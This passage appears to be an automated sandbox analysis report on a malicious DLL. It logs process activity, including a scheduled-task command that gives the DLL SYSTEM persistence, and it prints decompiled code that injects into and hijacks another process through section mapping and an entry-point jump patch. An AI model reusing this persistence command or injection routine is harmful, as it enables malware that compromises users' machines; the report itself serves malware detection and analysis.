Sep 25, 2021 10:24:45.691792965 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:24:45.709078074 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 25, 2021 10:24:46.783740044 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:24:46.817936897 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 25, 2021 10:25:18.700589895 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 25, 2021 10:25:18.728830099 CEST	53	56627	8.8.8.8	192.168.2.4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5756 Parent PID: 5240

General

Start time:	10:23:08
Start date:	25/09/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:	0x2e0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 796 Parent PID: 5756

General

Start time:	10:23:09
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6352 Parent PID: 796

General

Start time:	10:23:10
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Imagebase:	0x370000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 5616 Parent PID: 5756

General

Start time:	10:23:15
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x1020000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 5620 Parent PID: 6352

General

Start time:	10:23:17
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x1020000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6604 Parent PID: 5616

General

Start time:	10:23:19
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37
Imagebase:	0x8b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6624 Parent PID: 6604

General

Start time:	10:23:20
Start date:	25/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5912 Parent PID: 968

General

Start time:	10:23:22
Start date:	25/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:	0x7ff674450000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5944 Parent PID: 5912

General

Start time:	10:23:22
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:	0x1320000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1372 Parent PID: 5944

General

Start time:	10:23:28
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660
Imagebase:	0x1c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 7080 Parent PID: 968

General

Start time:	10:25:00
Start date:	25/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:	0x7ff674450000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 5576 Parent PID: 7080

General

Start time:	10:25:00
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:	0x1320000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 6788 Parent PID: 5576

General

Start time:	10:25:02
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 652
Imagebase:	0x1c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5756 Parent PID: 5240 loaddll32.exeCOMMON

Executed Functions

Function 1000D02A, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000D02A(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				int _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E100085EA(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x306f878
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E1001230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FA4(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000B9EB(); // executed
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E1000BB73( *_t88) == 0) {
					_t90 = E1000BA48(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3FC(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3C1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_push(0); // executed
				if(GetLastError() == 0) {
					GetLastError();
				}
				_t98 = GetSystemMetrics(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FA4(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B78E(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B663(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FBE(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D40B(_t43, E1000C384(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B870(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBC5(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x306f878
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095C7(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x306f878
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085BB( &_v8);
				_t124 =  *0x1001e684; // 0x306f878
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009626(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x306f878
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x306f878
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x306f878
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E1001230C(E1000D40B(_t75, E1000C384(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122DE( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E10009013(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD3E(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

0x1000d02a
0x1000d034
0x1000d040
0x1000d045
0x1000d04a
0x1000d40a
0x1000d40a
0x1000d057
0x1000d05d
0x1000d062
0x1000d068
0x1000d078
0x1000d084
0x1000d084
0x1000d08d
0x1000d093
0x1000d095
0x1000d09e
0x1000d09e
0x1000d0aa
0x1000d0ae
0x1000d0b3
0x1000d0b9
0x1000d0c2
0x1000d0d0
0x1000d0d7
0x1000d0dc
0x1000d0dc
0x1000d0dd
0x1000d0c4
0x1000d0c4
0x1000d0c4
0x1000d0e3
0x1000d0e9
0x1000d0ee
0x1000d0f4
0x1000d0fc
0x1000d102
0x1000d106
0x1000d10c
0x1000d113
0x1000d11a
0x1000d11e
0x1000d125
0x1000d126
0x1000d133
0x1000d13a
0x1000d147
0x1000d149
0x1000d149
0x1000d155
0x1000d161
0x1000d171
0x1000d177
0x1000d17d
0x1000d17f
0x1000d190
0x1000d196
0x1000d19c
0x1000d1a1
0x1000d1a7
0x1000d1ad
0x1000d1b2
0x1000d1b7
0x1000d1b7
0x1000d1bd
0x1000d1bd
0x1000d1c6
0x1000d1d2
0x1000d1da
0x1000d1de
0x1000d1de
0x1000d1da
0x1000d1e2
0x1000d1e8
0x1000d1ee
0x1000d1f5
0x1000d206
0x1000d20c
0x1000d214
0x1000d21b
0x1000d21d
0x1000d22e
0x1000d234
0x1000d239
0x1000d23c
0x1000d23f
0x1000d245
0x1000d24b
0x1000d24d
0x1000d253
0x1000d25c
0x1000d25f
0x1000d25f
0x1000d262
0x1000d26a
0x1000d275
0x1000d27b
0x1000d26c
0x1000d26e
0x1000d26e
0x1000d284
0x1000d284
0x1000d28a
0x1000d292
0x1000d29d
0x1000d2a2
0x1000d2a8
0x1000d2aa
0x1000d2b7
0x1000d2b8
0x1000d2b9
0x1000d2c4
0x1000d2c6
0x1000d2cd
0x1000d2cd
0x1000d2d7
0x1000d2dc
0x1000d2e1
0x1000d2e1
0x1000d2e7
0x1000d2ee
0x1000d2ef
0x1000d2fc
0x1000d30f
0x1000d314
0x1000d319
0x1000d322
0x1000d322
0x1000d328
0x1000d32d
0x1000d333
0x1000d339
0x1000d33e
0x1000d347
0x1000d349
0x1000d350
0x1000d350
0x1000d356
0x1000d35e
0x1000d363
0x1000d364
0x1000d369
0x1000d372
0x1000d374
0x1000d37f
0x1000d37f
0x1000d388
0x1000d390
0x1000d397
0x1000d39c
0x1000d3ab
0x1000d3c3
0x1000d3ca
0x1000d3d8
0x1000d3ea
0x1000d3f1
0x1000d3f9
0x1000d3fe
0x00000000

APIs

Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

GetCurrentProcessId.KERNEL32 ref: 1000D051
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D08D
GetCurrentProcess.KERNEL32 ref: 1000D0AA
GetLastError.KERNEL32(00000000,?,00000114,00000080,?,?,?), ref: 1000D13C
GetLastError.KERNEL32 ref: 1000D149
GetSystemMetrics.USER32(00001000), ref: 1000D155
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D177
GetLastError.KERNEL32 ref: 1000D17D
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1D2
GetCurrentProcess.KERNEL32 ref: 1000D219

Part of subcall function 1000BA48: CloseHandle.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC

memset.MSVCRT ref: 1000D234
GetVersionExA.KERNEL32(00000000), ref: 1000D23F
GetCurrentProcess.KERNEL32(00000100), ref: 1000D259
GetSystemInfo.KERNEL32(?), ref: 1000D275
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D292

Strings

TEMP, xrefs: 1000D333, 1000D33E, 1000D34F
SystemDrive, xrefs: 1000D35E, 1000D369, 1000D37E
TEMP, xrefs: 1000D2FE
USERPROFILE, xrefs: 1000D2EF, 1000D31D
%s\%s, xrefs: 1000D304

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$ErrorLast$FileModuleNameSystem$AllocByteCharCloseDirectoryHandleHeapInfoMetricsMultiVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 385003945-2706916422
Opcode ID: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
Instruction ID: 5888c9f6af661bcb9cc61cc2503a615177fd6cb5ab4d5a94d274bd65592933d8
Opcode Fuzzy Hash: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
Instruction Fuzzy Hash: 7DB15A75600709AFE714EB74CC89FEA77E8EF18380F01482EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 1000C6CB, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6CB(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2ff04a0
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E249(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x306f9a0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E1000864F( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E10008600( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2ff04a0
					 *0x1001e688 = _t131;
					E100086C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C64A(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

0x1000c6d1
0x1000c6d8
0x1000c6da
0x1000c6dc
0x1000c6de
0x1000c6e1
0x1000c6e4
0x1000c6e7
0x1000c6ea
0x1000c6ed
0x1000c6f0
0x1000c6fa
0x1000c6fd
0x1000c704
0x1000c709
0x1000c709
0x1000c70f
0x1000c711
0x1000c71a
0x1000c8c0
0x1000c8c4
0x1000c8c9
0x1000c8cf
0x1000c8d2
0x1000c8d2
0x1000c8d6
0x1000c8db
0x1000c8ed
0x1000c8ed
0x1000c8f6
0x1000c900
0x1000c900
0x1000c907
0x1000c907
0x1000c729
0x1000c743
0x00000000
0x00000000
0x1000c74e
0x1000c758
0x1000c762
0x1000c765
0x1000c76b
0x1000c772
0x1000c773
0x1000c774
0x1000c77d
0x1000c77e
0x1000c77f
0x1000c781
0x1000c784
0x1000c787
0x1000c78a
0x1000c78d
0x1000c799
0x1000c7bb
0x1000c7c3
0x1000c7c6
0x1000c7d1
0x1000c7d1
0x1000c7c3
0x1000c7fc
0x1000c8bd
0x00000000
0x1000c802
0x1000c80e
0x1000c823
0x00000000
0x00000000
0x1000c839
0x1000c83b
0x1000c842
0x00000000
0x00000000
0x1000c853
0x1000c86a
0x1000c87a
0x1000c886
0x1000c88b
0x1000c891
0x1000c8a1
0x1000c8ad
0x1000c8b5
0x00000000
0x1000c8b5

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
RegisterClassExA.USER32(00000030), ref: 1000C790
CreateWindowExA.USER32 ref: 1000C7BB
DestroyWindow.USER32(00000000), ref: 1000C7C6
UnregisterClassA.USER32 ref: 1000C7D1
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7ED
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7F7
NtMapViewOfSection.NTDLL(?,1000CBAB,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C81E
VirtualAllocEx.KERNELBASE(1000CBAB,00000000,00001AC4,00001000,00000004), ref: 1000C861
WriteProcessMemory.KERNELBASE(1000CBAB,00000000,00000000,00001AC4,?), ref: 1000C87A

Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8E6
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8ED
NtClose.NTDLL(00000000), ref: 1000C900

Strings

cdcdwqwqwq, xrefs: 1000C775
0, xrefs: 1000C758
sadccdcdsasa, xrefs: 1000C749

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
Instruction ID: d4ed6399113d3519698ced96f191084217c42ad0747b1462dfeddcfc8903a4cc
Opcode Fuzzy Hash: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
Instruction Fuzzy Hash: 49713971900259AFEB11CF95CC88EAFBBB9FF49740F214469F605A7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB82, Relevance: 9.1, APIs: 6, Instructions: 105
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CB82(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4D9(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6CB( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t73[1],  &_v744) != 0) {
							_t70 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v744.Eax,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E10008600(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

0x1000cb8e
0x1000cb90
0x1000cb92
0x1000cb9b
0x1000cba6
0x1000cbab
0x1000cbaf
0x1000cbc3
0x1000cbcb
0x1000cbec
0x1000cbf2
0x1000cbfa
0x1000cc08
0x1000cc0e
0x1000cc0f
0x1000cc1b
0x1000cc22
0x1000cc32
0x1000cc72
0x1000cc72
0x1000cc51
0x1000cc51
0x1000cc70
0x00000000
0x00000000
0x1000cc70
0x1000cc32
0x1000cbec
0x1000cbaf
0x1000cc74
0x1000cc7b
0x1000cc7e
0x1000cc84
0x1000cc84
0x1000cc8b
0x1000cc92
0x1000cc95
0x1000cc9a
0x1000cca7
0x1000ccad
0x1000ccb4

APIs

Part of subcall function 1000C4D9: LoadLibraryW.KERNEL32 ref: 1000C5D1
Part of subcall function 1000C4D9: memset.MSVCRT ref: 1000C610

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E

Part of subcall function 1000C6CB: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
Part of subcall function 1000C6CB: RegisterClassExA.USER32(00000030), ref: 1000C790
